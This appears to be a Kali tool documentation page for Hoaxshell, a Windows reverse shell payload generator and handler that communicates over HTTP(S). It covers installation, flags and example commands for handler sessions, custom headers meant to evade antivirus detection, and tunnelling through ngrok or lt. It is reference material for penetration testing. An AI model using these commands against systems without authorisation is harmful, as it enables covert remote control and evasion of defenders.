Exploitationreverse-shellwindowshttphttpspayloadbeacon

Hoaxshell

Hoaxshell is a Windows reverse shell payload generator and handler that abuses the HTTP(S) protocol to establish a beacon-like reverse shell. It generates payloads and handles sessions over standard web protocols.

Description

Hoaxshell provides a method to generate and manage Windows reverse shells by leveraging HTTP(S) for communication, mimicking legitimate web traffic to evade detection. It is particularly useful in penetration testing scenarios where traditional shell protocols might be blocked or monitored.

The tool supports both HTTP and HTTPS modes, with options for custom headers, encrypted sessions, and integration with reverse proxies. This makes it suitable for establishing persistent, low-detection reverse shells on target Windows systems.

Key use cases include generating undetectable payloads for initial access, maintaining command and control (C2) over HTTP(S), and handling shell interactions through a Python-based interface.

How It Works

Hoaxshell operates by generating a Windows payload that establishes a reverse connection to the handler over HTTP(S). The shell session data is transferred via HTTP headers (with customizable names to evade regex-based AV detection). It functions in a beacon-like manner, polling the server at specified frequencies. HTTPS support uses provided certificates for encryption, and options like reverse proxy tunneling (-lt, -ng) enable integration with tools for additional obfuscation.

Installation

bash

sudo apt install hoaxshell

Flags

-s, --server-ip SERVER_IPYour hoaxshell server ip address or domain.

-c, --certfile CERTFILEPath to your ssl certificate.

-k, --keyfile KEYFILEPath to the private key for your certificate.

-p, --port PORTYour hoaxshell server port (default: 8080 over http, 443 over https).

-f, --frequency FREQUENCYBeacon frequency.

-iInteractive mode.

-H, --header HEADERCustom HTTP header name.

-x, --exec-outfile EXEC_OUTFILEOutput file for generated payload.

-rUnknown from help.

-oUnknown from help.

-v, --server-version SERVER_VERSIONServer version.

-gUnknown from help.

-tHTTPS mode.

-cmUnknown from help.

-ltReverse proxy tunneling (e.g., with lt).

-ngReverse proxy tunneling (e.g., with ngrok).

-uUnknown from help.

-qQuiet mode.

Examples

Basic shell session over http.

hoaxshell -s <your_ip>

Recommended usage to avoid detection over http, using custom header.

hoaxshell -s <your_ip> -i -H "Authorization"

Usage with custom header and exec outfile over http.

hoaxshell -s <your_ip> -i -H "Authorization" -x "C:\Users\$env:USERNAME\.local\hack.ps1"

Encrypted shell session over https with a trusted certificate.

hoaxshell -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

Encrypted shell session over https with a self-signed certificate (after generating certs with openssl).

hoaxshell -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

Encrypted shell session with reverse proxy tunneling tools (e.g., lt).

hoaxshell -lt

Encrypted shell session with reverse proxy tunneling tools (e.g., ngrok).

hoaxshell -ng

Show help message and usage options.

hoaxshell -h

Updated 2026-04-16kali.org ↗